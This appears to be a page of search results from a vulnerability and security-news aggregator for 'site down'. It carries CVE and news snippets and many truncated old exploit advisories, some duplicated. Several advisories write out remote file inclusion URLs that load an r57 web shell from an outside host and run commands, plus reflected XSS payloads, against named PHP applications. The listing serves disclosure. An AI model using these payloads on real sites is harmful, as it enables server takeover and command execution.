CVE-2020-36413

A stored cross scripting XSS vulnerability in CMS Made Simple 2.2.14 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Exclude these IP addresses from the "Site Down" status" parameter under the "Maintenance Mode" module...

CMS Made Simple 跨站脚本漏洞

CMS Made Simple CMSMS is an open source content management system that provides developers, programmers, and website owners with a web-based version of the development and management interface. A stored cross-site scripting vulnerability exists in CMS Made Simple version 2.2.14, which can be...

BlockChain.info Domain Hijacked; Site Goes Down; 8 Million Bitcoin Wallets Inaccessible

UPDATE: The site is back and working. Blockchain team released a statement via Twitter, which has been added at the end of this article. If you are fascinated with the idea of digital currency, then you might have heard about BlockChain.Info. It’s Down! Yes, Blockchain.info, the world's most...

WordPress EWWW Image Optimizer Plugin <= 2.8.3 - Remote Code Execution

Because of this vulnerability, attackers can create a backdoor or take a site down altogether. Solution Upgrade this plugin...

'The New York Iron Works' police supplier Hacked by Anonymous

'The New York Iron Works' police supplier Hacked by Anonymous Anonymous Hackers with the Antisec movement have attacked the site of a company that sells equipment to US law enforcers such as the police. Members of Anonymous recently hacked the official site for law enforcement equipment supplier...

Pakcyberarmy.net is now down by Max11

Pakcyberarmy.net is now down by Max11 Site : https://pakcyberarmy.net/ Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post...

randshop12.txt

file include exploits in randshop v1.2 forum type : randshop v1.2 bug found by : black-code team : site-down type : file include Exploits : http://www.example.com/randshop/index.php?incl=http://evilscript? emails: [email protected] & [email protected] Greetz to my friends : Shereba, Killer...

file include exploits in randshop v1.2

file include exploits in randshop v1.2 forum type : randshop v1.2 bug found by : black-code team : site-down type : file include Exploits : http://www.example.com/randshop/index.php?incl=http://evilscript? emails: [email protected] & [email protected] Greetz to my friends : Shereba, Killer...

nucleus323.txt

Multiple file include exploits in nucleus 3.23 script type : nucleus 3.23 bug found by : sweet-devil team : site-down type : file include exploits : action.php http://www.example.com/path/action.php?DIRLIBS=http://yoursite/r57shell.txt? media.php...

file include exploits in mcGuestbook 1.3

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...

file include exploits in dotwidgeta Version 2

Multiple file include exploits in dotwidgeta Version 2 script type : dotwidgeta Version 2 bug found by : sweet-devil team : site-down type : file include exploits : index.php http://www.example.com/path/index.php?filepath=http://yoursite/r57shell.txt? ecrire.php...

mcGuestbook13.txt

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...

file include exploits in mcGuestbook 1.3

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...

xtreme10.txt

Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...

file include in Xtreme Downloads v.1.0

Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...

file include exploit in Support Cards v1

file include exploit in Support Cards v1 forum type : Support cards v1 bug found by : sweet-devil team : site-down type : file include exploit : http://www.example.com/support/include/openform.php?includedir=http://ursite/evilscript.txt?cmd=pwd emails: [email protected] & [email protected]...

Xss exploit in Chipmunk directory

Xss exploit in Chipmunk directory forum type : Chipmunk directory bug found by : black-code team : site-down type : Xss black-code: codes : http://www.example.com/directory/index.php?catid=catid&start='scriptalert10/script path to admin login: http://www.xxx.com/path/admin All my respect to my...

multiple file include exploits in EzUpload Pro v2.10

multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code & sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd customize.php...

Xss exploit in Photoalbum B&amp;W v1.3

Xss exploit in Photoalbum B&W v1.3 forum type : Photoalbum B&W v1.3 bug found by : black-code & sweet-devil team : site-down type : Xss exploit : http://www.example.com/superalbum/index.php?pic='scriptalert10/script path to admin login: emails: [email protected] & [email protected] All my...

Multiple Xss exploits in ar-blog v 5.2

Multiple Xss exploits in ar-blog v 5.2 forum type : ar-blog v 5.2 bug found by : black-code team : site-down type : Xss black-code: http://www.xxx.com/path/index.php?page=gb&count=next='scriptalert10/script http://www.xxx.com/path/index.php?page=gb&count='scriptalert10/script...